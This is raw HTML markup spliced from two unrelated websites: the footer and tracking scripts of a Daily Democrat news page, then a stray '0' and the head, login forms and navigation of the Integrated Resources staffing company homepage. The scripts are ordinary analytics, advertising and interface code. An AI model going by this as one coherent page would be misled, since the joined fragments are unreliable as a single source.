class="menu-item menu-item-type-post_type menu-item-object-page menu-item-148"><a href="https://www.dailydemocrat.com/special-sections/">Special Sections</a></li> </ul> </li> <li id="menu-item-149" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-149"><a>Subscriber Services</a><span class="expander"><a href="#" class="icon-plus"></a></span> <ul class="footer-menu"> <li id="menu-item-150" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-150"><a href="https://checkout.dailydemocrat.com/">Subscribe</a></li> <li id="menu-item-153" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-153"><a href="https://www.dailydemocrat.com/customer-service/">Customer Service</a></li> </ul> </li> </ul></div> <div class="colophon"> <ul id="footer-bottom-menu" class="menu"><li id="menu-item-2557739" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2557739"><a href="https://www.medianewsgroup.com/copyright/">Copyright © 2019 MediaNews Group, Inc.</a></li> <li id="menu-item-184371" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184371"><a href="https://www.medianewsgroup.com/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-2548768" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2548768"><a href="https://www.medianewsgroup.com/terms-of-use/">Terms of Use</a></li> <li id="menu-item-184419" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-184419"><a href="https://www.medianewsgroup.com/cookie-policy/">Cookie Policy</a></li> <li id="menu-item-159" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-159"><a href="https://www.medianewsgroup.com/arbitration/">Arbitration</a></li> <li id="menu-item-161" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-161"><a href="https://vip.wordpress.com">Powered by WordPress.com VIP</a></li> </ul> </div> </footer><!-- .site-footer --> </div><!-- #page --> <script> (function(w) { if ( null !== document.cookie.match(/^(.*;)?\s*igmRegID\s*=\s*[^;]+(.*)?$/) ) { w.PARSELY = { autotrack: false, onReady: function() { PARSELY.updateDefaults({ data: { plan: "subscriber" } }); PARSELY.beacon.trackPageView(); } }; } })(window); </script> <!-- START Parse.ly Include: Standard --> <div id="parsely-root" style="display: none"> <div id="parsely-cfg" data-parsely-site="dailydemocrat.com"></div> </div> <script data-cfasync="false"> (function (s, p, d) { var h = d.location.protocol, i = p + "-" + s, e = d.getElementById(i), r = d.getElementById(p + "-root"), u = h === "https:" ? "d1z2jf7jlzjs58.cloudfront.net" : "static." + p + ".com"; if (e) return; e = d.createElement(s); e.id = i; e.async = true; e.setAttribute('data-cfasync', 'false'); e.src = h + "//" + u + "/p.js"; r.appendChild(e); })("script", "parsely", document); </script> <!-- END Parse.ly Include: Standard --> <div id="mobile-adhesion"><button class="close-mobile-adhesion" onclick="closeMobileAdhesionAd()">Close</button> <script> function closeMobileAdhesionAd() { document.getElementById("mobile-adhesion").classList.add("closed"); } </script> <div id="div-gpt-ad-mobile_adhesion" class="dfp-ad dfp-mobile_adhesion" data-ad-unit="mobile_adhesion"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-mobile_adhesion"); } ); } </script> </div></div> <div style="display:none"> <div class="grofile-hash-map-49d4ffd2a4ad632489f5fd4a48ee692a"> </div> <div class="grofile-hash-map-ddb2170fde8d8e5f0a1bd34eaf5131ae"> </div> <div class="grofile-hash-map-e0b430eef885203978254e9396e90ad4"> </div> <div class="grofile-hash-map-a677927d17a807974f789b4fa25dd88b"> </div> <div class="grofile-hash-map-5048f624e689c37b1787405779417d7c"> </div> <div class="grofile-hash-map-2e82865cc6c76b3ebaba68fc2c7e7203"> </div> <div class="grofile-hash-map-f31c4e2304989cdf1f9a9d5c3d5d85a5"> </div> <div class="grofile-hash-map-892c560b80ab565cb7710e49255d0de8"> </div> </div> <script type='text/javascript'> /* <![CDATA[ */ if ( 'undefined' !== typeof _snaq ) { _snaq.push(['setAuthor', '']); _snaq.push(['setArticlePublishTime','']); _snaq.push(['setSection', 'Home']); } /* ]]> */ </script> <div id="mg2Widget-newsletter-container"></div><script type='text/javascript' src='https://www.dailydemocrat.com/_static/??-eJyNy0sKgCAQANALlUMLxRbRWcKmGtFR/BR5+gg6QNsHD67Ym8AFuUB0dSfOEI9QAm/kHJzIa0gQyZSa8CXhiYXNHfyKbml3pob5a7OfBimlHrVS2j7pjy66'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.dailydemocrat.com/wp-content/mu-plugins/jetpack/modules/wpgroho.js?m=1557436032g'></script> <script type='text/javascript' src='https://www.dailydemocrat.com/wp-content/themes/wp-mason/static/js/ads.js?ver=1.0'></script> <script type='text/javascript' src='https://assets.digitalfirstmedia.com/prod/static/js/common.fc85b60dcd65e12a3e60.min.js?ver=1.0'></script> <!--[if lt IE 10]> <script type='text/javascript' src='https://assets.digitalfirstmedia.com/prod/static/js/polyfills.fc85b60dcd65e12a3e60.min.js?ver=1.0'></script> <![endif]--> <script type='text/javascript' src='https://assets.digitalfirstmedia.com/prod/static/js/measuredvibrant.fc85b60dcd65e12a3e60.min.js?ver=1.0'></script> <script type='text/javascript' src='https://www.dailydemocrat.com/wp-content/themes/wp-mason/static/js/global.min.js?m=1555898668g'></script> <script async type='text/javascript' src='https://s.ntv.io/serve/load.js'></script> <script type='text/javascript' src='https://c.go-fet.ch/a/embed.js?ver=1.0.0'></script> <script type='text/javascript' src='https://www.dailydemocrat.com/wp-includes/js/wp-embed.min.js?m=1557265155g'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3',blog:'151871310',post:'0',tz:'-7',srv:'www.dailydemocrat.com'} ]); _stq.push([ 'clickTrackerInit', '151871310', '0' ]); </script> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"7998548d3f","applicationID":"166616219","transactionName":"Ml0BbUEAXENYUBBfWAsXIlpHCF1eFlUWWVkRFRNYVAQ=","queueTime":0,"applicationTime":451,"atts":"HhoWGwkaTxwbUkYMTBhF","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"/> <meta name="twitter:widgets:csp" content="on"/> <link rel="profile" href="https://gmpg.org/xfn/11"/> <link rel="pingback" href="https://irionline.com/xmlrpc.php"/> <!-- Global site tag (gtag.js) - Google Ads: 769750920 --> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-769750920"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'AW-769750920'); </script> <title>Hiring | Recruitment | Placement | Executive Job Search | Job Posting&#039;s | Talent Acquisition</title> <!-- PVC Template --> <script type="text/template" id="pvc-stats-view-template"> <i class="fa fa-bar-chart pvc-stats-icon medium" aria-hidden="true"></i> <% if ( total_view > 0 ) { %> <%= total_view %> <%= total_view > 1 ? "total views" : "total view" %>, <% if ( today_view > 0 ) { %> <%= today_view %> <%= today_view > 1 ? "views today" : "view today" %> <% } else { %> no views today <% } %> <% } else { %> No views yet <% } %> </script> <!-- This site is optimized with the Yoast SEO plugin v10.1.3 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Find &amp; engage with the best candidates. Competitive pricing. 1500+ Job listings . Large talent network. Types: Clinical Recruitment, IT Recruitment, Scientific Recruitment, Healthcare Recruitment, Engineering Recruitment."/> <link rel="canonical" href="https://irionline.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Hiring | Recruitment | Placement | Executive Job Search | Job Posting&#039;s | Talent Acquisition" /> <meta property="og:description" content="Find &amp; engage with the best candidates. Competitive pricing. 1500+ Job listings . Large talent network. Types: Clinical Recruitment, IT Recruitment, Scientific Recruitment, Healthcare Recruitment, Engineering Recruitment." /> <meta property="og:url" content="https://irionline.com/" /> <meta property="og:site_name" content="Hiring | Recruitment | Placement | Executive Job Search | Job Posting&#039;s | Talent Acquisition" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Find &amp; engage with the best candidates. Competitive pricing. 1500+ Job listings . Large talent network. Types: Clinical Recruitment, IT Recruitment, Scientific Recruitment, Healthcare Recruitment, Engineering Recruitment." /> <meta name="twitter:title" content="Hiring | Recruitment | Placement | Executive Job Search | Job Posting&#039;s | Talent Acquisition" /> <meta name="twitter:site" content="@iristaff" /> <meta name="twitter:creator" content="@iristaff" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://irionline.com/#website","url":"https://irionline.com/","name":"Integrated Resources Inc","potentialAction":{"@type":"SearchAction","target":"https://irionline.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://irionline.com/","sameAs":["https://www.facebook.com/Integrated-Resources-Inc-192970164133844/","https://www.instagram.com/iri_staff/","https://www.linkedin.com/company/integrated-resources-inc/","https://www.youtube.com/channel/UCcHtzakc0q-h-o_b7ZMWvtw/videos?view_as=subscriber","https://www.pinterest.com/iristaff/","https://twitter.com/iristaff"],"@id":"https://irionline.com/#organization","name":"Integrated Resources, Inc.","logo":"https://irionline.com/wp-content/uploads/2018/05/iri-blue-logo.jpg"}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//code.jquery.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Hiring | Recruitment | Placement | Executive Job Search | Job Posting&#039;s | Talent Acquisition &raquo; Feed" href="https://irionline.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Hiring | Recruitment | Placement | Executive Job Search | Job Posting&#039;s | Talent Acquisition &raquo; Comments Feed" href="https://irionline.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/irionline.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='zn_all_g_fonts-css' href='//fonts.googleapis.com/css?family=Roboto%3A300%2Cregular%2C700%2C900%7CLato%3A100%2C300%2Cregular%2C700%2C900&#038;ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-styles-css' href='https://irionline.com/wp-content/plugins/page-views-count/admin/assets/css/font-awesome.min.css?ver=4.5.0' type='text/css' media='all' /> <link rel='stylesheet' id='a3-pvc-style-css' href='https://irionline.com/wp-content/plugins/page-views-count/assets/css/style.min.css?ver=2.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='hg-mailchimp-styles-css' href='https://irionline.com/wp-content/themes/kallyas/framework/hogash-mailchimp/assets/css/hg-mailchimp.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='kallyas-styles-css' href='https://irionline.com/wp-content/themes/kallyas/style.css?ver=4.16.0' type='text/css' media='all' /> <link rel='stylesheet' id='th-bootstrap-styles-css' href='https://irionline.com/wp-content/themes/kallyas/css/bootstrap.min.css?ver=4.16.0' type='text/css' media='all' /> <link rel='stylesheet' id='th-theme-template-styles-css' href='https://irionline.com/wp-content/themes/kallyas/css/template.min.css?ver=4.16.0' type='text/css' media='all' /> <link rel='stylesheet' id='zion-frontend-css' href='https://irionline.com/wp-content/themes/kallyas/framework/zion-builder/assets/css/znb_frontend.css?ver=1.0.20' type='text/css' media='all' /> <link rel='stylesheet' id='6-layout.css-css' href='//irionline.com/wp-content/uploads/zion-builder/cache/6-layout.css?ver=6234aa077534294241887dabdb20c578' type='text/css' media='all' /> <link rel='stylesheet' id='a3pvc-css' href='//irionline.com/wp-content/uploads/sass/pvc.min.css?ver=1543877224' type='text/css' media='all' /> <link rel='stylesheet' id='kallyas-child-css' href='https://irionline.com/wp-content/themes/kallyas-child/style.css?ver=4.16.0' type='text/css' media='all' /> <link rel='stylesheet' id='font_awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='th-theme-print-stylesheet-css' href='https://irionline.com/wp-content/themes/kallyas/css/print.css?ver=4.16.0' type='text/css' media='print' /> <link rel='stylesheet' id='th-theme-options-styles-css' href='//irionline.com/wp-content/uploads/zn_dynamic.css?ver=1555000889' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><link rel='https://api.w.org/' href='https://irionline.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://irionline.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://irionline.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel='shortlink' href='https://irionline.com/' /> <link rel="alternate" type="application/json+oembed" href="https://irionline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Firionline.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://irionline.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Firionline.com%2F&#038;format=xml" /> <meta name="theme-color" content="#d44900"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/> <!--[if lte IE 8]> <script type="text/javascript"> var $buoop = { vs: {i: 10, f: 25, o: 12.1, s: 7, n: 9} }; $buoop.ol = window.onload; window.onload = function () { try { if ($buoop.ol) { $buoop.ol() } } catch (e) { } var e = document.createElement("script"); e.setAttribute("type", "text/javascript"); e.setAttribute("src", "https://browser-update.org/update.js"); document.body.appendChild(e); }; </script> <![endif]--> <!-- for IE6-8 support of HTML5 elements --> <!--[if lt IE 9]> <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- Fallback for animating in viewport --> <noscript> <style type="text/css" media="screen"> .zn-animateInViewport {visibility: visible;} </style> </noscript> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <link rel="icon" href="https://irionline.com/wp-content/uploads/2018/11/IRI-icon.png" sizes="32x32" /> <link rel="icon" href="https://irionline.com/wp-content/uploads/2018/11/IRI-icon.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://irionline.com/wp-content/uploads/2018/11/IRI-icon.png" /> <meta name="msapplication-TileImage" content="https://irionline.com/wp-content/uploads/2018/11/IRI-icon.png" /> <style type="text/css" id="wp-custom-css"> .site-header-top-wrapper { display:none; } </style> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-129582006-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-129582006-1'); </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-NQKL4SL');</script> <!-- End Google Tag Manager --><script id="mcjs">!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/c8cc8b14936481f06ab463d9b/51e40f74d332d26552c6c9083.js");</script> <body data-rsssl=1 class="home page-template-default page page-id-6 res1170 kl-skin--light" itemscope="itemscope" itemtype="https://schema.org/WebPage" > <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NQKL4SL" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --><div class="login_register_stuff"> <!-- Login/Register Modal forms - hidden by default to be opened through modal --> <div id="login_panel" class="loginbox-popup auth-popup mfp-hide"> <div class="inner-container login-panel auth-popup-panel"> <h3 class="m_title_ext auth-popup-title" itemprop="alternativeHeadline" >SIGN IN YOUR ACCOUNT TO HAVE ACCESS TO DIFFERENT FEATURES</h3> <form id="login_form" name="login_form" method="post" class="zn_form_login znhg-ajax-login-form" action="https://irionline.com/wp-login.php"> <div class="zn_form_login-result"></div> <div class="form-group kl-fancy-form"> <input type="text" id="kl-username" name="log" class="form-control inputbox kl-fancy-form-input kl-fw-input" placeholder="eg: james_smith"/> <label class="kl-font-alt kl-fancy-form-label">USERNAME</label> </div> <div class="form-group kl-fancy-form"> <input type="password" id="kl-password" name="pwd" class="form-control inputbox kl-fancy-form-input kl-fw-input" placeholder="type password"/> <label class="kl-font-alt kl-fancy-form-label">PASSWORD</label> </div> <label class="zn_remember auth-popup-remember" for="kl-rememberme"> <input type="checkbox" name="rememberme" id="kl-rememberme" value="forever" class="auth-popup-remember-chb"/> Remember Me </label> <input type="submit" id="login" name="submit_button" class="btn zn_sub_button btn-fullcolor btn-md" value="LOG IN"/> <input type="hidden" value="login" class="" name="zn_form_action"/> <input type="hidden" value="zn_do_login" class="" name="action"/> <div class="links auth-popup-links"> <a href="#forgot_panel" class="kl-login-box auth-popup-link">FORGOT YOUR PASSWORD?</a> </div> </form> </div> </div> <!-- end login panel --> <div id="forgot_panel" class="loginbox-popup auth-popup forgot-popup mfp-hide"> <div class="inner-container forgot-panel auth-popup-panel"> <h3 class="m_title m_title_ext text-custom auth-popup-title" itemprop="alternativeHeadline" >FORGOT YOUR DETAILS?</h3> <form id="forgot_form" name="login_form" method="post" class="zn_form_lost_pass" action="https://irionline.com/wp-login.php?action=lostpassword"> <div class="zn_form_login-result"></div> <div class="form-group kl-fancy-form"> <input type="text" id="forgot-email" name="user_login" class="form-control inputbox kl-fancy-form-input kl-fw-input" placeholder="..."/> <label class="kl-font-alt kl-fancy-form-label">USERNAME OR EMAIL</label> </div> <input type="hidden" name="wc_reset_password" value="true"> <input type="hidden" id="_wpnonce" name="_wpnonce" value="ed1ff5d63b" /><input type="hidden" name="_wp_http_referer" value="/" /> <div class="form-group"> <input type="submit" id="recover" name="submit" class="btn btn-block zn_sub_button btn-fullcolor btn-md" value="SEND MY DETAILS!"/> </div> <div class="links auth-popup-links"> <a href="#login_panel" class="kl-login-box auth-popup-link">AAH, WAIT, I REMEMBER NOW!</a> </div> </form> </div> </div><!-- end forgot pwd. panel --> </div><!-- end login register stuff --> <div id="fb-root"></div> <script>(function (d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.5"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div id="page_wrapper"> <div class="ll-top-bar"> <a href="https://www.facebook.com/Integrated-Resources-Inc-192970164133844/" target="blank"><i class="fa fa-facebook"></i></a> <a href="https://www.youtube.com/channel/UCcHtzakc0q-h-o_b7ZMWvtw/featured" target="blank"><i class="fa fa-youtube"></i></a> <a href="https://twitter.com/iristaff" target="blank"><i class="fa fa-twitter"></i></a> <a href="https://www.linkedin.com/company/integrated-resources" target="blank"><i class="fa fa-linkedin"></i></a> <a href="https://plus.google.com/106841896442250985983" target="blank"><i class="fa fa-google-plus"></i></a> <a style="color: white; float: right;" href="https://workforcenow.adp.com/" target="blank">Employee Login<i class="fa fa-sign-in"></i></a> </div> <header id="header" class="site-header style12 header--no-stick sticky-resize headerstyle--default site-header--absolute nav-th--light sheader-sh--dark" role="banner" itemscope="itemscope" itemtype="https://schema.org/WPHeader" > <div class="site-header-wrapper sticky-top-area"> <div class="site-header-top-wrapper topbar-style--default sh--dark"> <div class="siteheader-container container"> <div class="fxb-row site-header-row site-header-top "> <div class='fxb-col fxb fxb-start-x fxb-center-y fxb-basis-auto site-header-col-left site-header-top-left'> </div> <div class='fxb-col fxb fxb-end-x fxb-center-y fxb-basis-auto site-header-col-right site-header-top-right'> <ul class="sh-component topnav navRight topnav--log topnav-no-sc topnav-no-hdnav"><li class="topnav-li"><a href="#login_panel" class="kl-login-box topnav-item"><i class="glyphicon glyphicon-log-in visible-xs xs-icon"></i><span class="hidden-xs">LOGIN</span></a></li></ul> </div> </div><!-- /.site-header-top --> </div> </div><!-- /.site-header-top-wrapper --> <div class="kl-top-header site-header-main-wrapper clearfix header-no-bottom sh--dark"> <div class="container siteheader-container "> <div class='fxb-col fxb-basis-auto'> <div class="fxb-row site-header-row site-header-main "> <div class='fxb-col fxb fxb-start-x fxb-center-y fxb-basis-auto fxb-grow-0 fxb-sm-half site-header-col-left site-header-main-left'> <div id="logo-container" class="logo-container hasHoverMe logosize--contain zn-original-logo"> <!-- Logo --> <h1 class='site-logo logo ' id='logo'><a href='https://irionline.com/' class='site-logo-anch'><img class="logo-img site-logo-img" src="https://irionline.com/wp-content/uploads/2018/05/iri-blue-logo.jpg" alt="Hiring | Recruitment | Placement | Executive Job Search | Job Posting&#039;s | Talent Acquisition" title="Integrated Resources Inc" /></a></h1> <!-- InfoCard --> </div> </div> <div class='fxb-col fxb fxb-center-x fxb-center-y fxb-basis-auto fxb-grow-0 site-header-col-center site-header-main-center'> </div> <div class='fxb-col fxb fxb-end-x fxb-center-y fxb-basis-auto fxb-sm-half site-header-col-right site-header-main-right'> <div class='fxb-col fxb fxb-end-x fxb-center-y fxb-basis-auto fxb-sm-half site-header-main-right-top'> <div class="sh-component main-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" > <div class="zn-res-menuwrapper"> <a href="#" class="zn-res-trigger zn-menuBurger zn-menuBurger--3--s zn-menuBurger--anim1 " id="zn-res-trigger"> <span></span> <span></span> <span></span> </a> </div><!-- end responsive menu --> <div id="main-menu" class="main-nav mainnav--sidepanel mainnav--active-text mainnav--pointer-dash nav-mm--light zn_mega_wrapper "><ul id="menu-primary" class="main-menu main-menu-nav zn_mega_menu "><li id="menu-item-24" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6 current_page_item menu-item-24 active main-menu-item-top menu-item-even menu-item-depth-0"><a href="https://irionline.com/" class=" main-menu-link main-menu-link-top"><span>Home</span></a></li> <li id="menu-item-110" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-110 main-menu-item-top menu-item-even menu-item-depth-0"><a href="https://irionline.com/about/" class=" main-menu-link main-menu-link-top"><span>About</span></a></li> <li id="menu-item-215" class="main-menu-item menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215 main-menu-item-top menu-item-even menu-item-depth-0"><a href="#" class=" main-menu-link main-menu-link-top"><span>Services</span></a> <ul class="sub-menu clearfix"> <li id="menu-item-109" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-109 main-menu-item-sub menu-item-odd menu-item-depth-1"><a href="https://irionline.com/staffing/" class=" main-menu-link main-menu-link-sub"><span>Staffing Solutions</span></a></li> <li id="menu-item-136" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-136 main-menu-item-sub menu-item-odd menu-item-depth-1"><a href="https://irionline.com/rpo/" class=" main-menu-link main-menu-link-sub"><span>Recruitment Process Outsourcing</span></a></li> <li id="menu-item-135" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-135 main-menu-item-sub menu-item-odd menu-item-depth-1"><a href="https://irionline.com/payrolling/" class=" main-menu-link main-menu-link-sub"><span>Payrolling</span></a></li> </ul> </li> <li id="menu-item-222" class="main-menu-item menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-222 main-menu-item-top menu-item-even menu-item-depth-0"><a href="#" class=" main-menu-link main-menu-link-top"><span>Careers</span></a> <ul class="sub-menu clearfix"> <li id="menu-item-223" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-223 main-menu-item-sub menu-item-odd menu-item-depth-1"><a href="https://irionline.com/why-work-with-iri/" class=" main-menu-link main-menu-link-sub"><span>Why Work with IRI</span></a></li> <li id="menu-item-318" class="main-menu-item menu-item menu-item-type-custom menu-item-object-custom menu-item-318 main-menu-item-sub menu-item-odd menu-item-depth-1"><a target="_blank" href="https://irionline.jobs.net/en-US/search" class=" main-menu-link main-menu-link-sub"><span>Current Openings</span></a></li> </ul> </li> <li id="menu-item-227" class="main-menu-item menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-227 main-menu-item-top menu-item-even menu-item-depth-0"><a href="#" class=" main-menu-link main-menu-link-top"><span>Insights</span></a> <ul class="sub-menu clearfix"> <li id="menu-item-228" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-228 main-menu-item-sub menu-item-odd menu-item-depth-1"><a href="https://irionline.com/news-and-updates/" class=" main-menu-link main-menu-link-sub"><span>News and Updates</span></a></li> <li id="menu-item-314" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-314 main-menu-item-sub menu-item-odd menu-item-depth-1"><a href="https://irionline.com/community-initiatives/" class=" main-menu-link main-menu-link-sub"><span>Community Initiatives</span></a></li> </ul> </li> <li id="menu-item-165" class="main-menu-item menu-item menu-item-type-post_type menu-item-object-page menu-item-165 main-menu-item-top menu-item-even menu-item-depth-0"><a href="https://irionline.com/contact/" class=" main-menu-link main-menu-link-top"><span>Contact</span></a></li> </ul></div> </div> <!-- end main_menu --> </div> </div> </div><!-- /.site-header-main --> </div> </div><!-- /.siteheader-container --> </div><!-- /.site-header-main-wrapper --> </div><!-- /.site-header-wrapper --> </header> <div class="zn_pb_wrapper clearfix zn_sortable_content" data-droplevel="0"> <section class="zn_section eluid66ee10c9 zn_parallax section-sidemargins zn_section--relative section--no " id="eluid66ee10c9" > <div class="zn-bgSource zn-bgSource-imageParallax js-znParallax" ><div class="zn-bgSource-image" style="background-image:url(https://irionline.com/wp-content/uploads/2018/07/shutterstock_343048862.jpg);background-repeat:no-repeat;background-position:center center;background-size:cover"></div><div class="zn-bgSource-overlay" style="background-color:rgba(53,53,53,0.5)"></div></div> <div class="zn_section_size container zn-section-height--custom_height zn-section-content_algn--middle "> <div class="row "> <div class="eluidf65af183 col-md-12 col-sm-12 znColumnElement" id="eluidf65af183" > <div class="znColumnElement-innerWrapper-eluidf65af183 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <h1 class="eluid21344eec dn-heading" id="eluid21344eec" itemprop="headline" >Source top-notch talent effortlessly</h1><h2 class="eluid4ab79a3e dn-heading" id="eluid4ab79a3e" itemprop="headline" >Comprehensive talent acquisition and placement solutions to bolster your workforce.</h2> </div> </div> </div> <div class="eluid2a227e5d col-md-6 col-sm-6 znColumnElement" id="eluid2a227e5d" > <div class="znColumnElement-innerWrapper-eluid2a227e5d znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="zn-buttonWrapper zn-buttonWrapper-eluid8fef1172 text-center"><a href="/find-talent" id="eluid8fef1172" class="eluid8fef1172 zn-button btn btn-fullcolor btn-md btn-block btn-fullwidth btn--square btn-icon--before" title="Find Top Talent | Hire Local Talent" target="_self" itemprop="url" ><span class="zn-buttonText">Find Talent</span></a></div> </div> 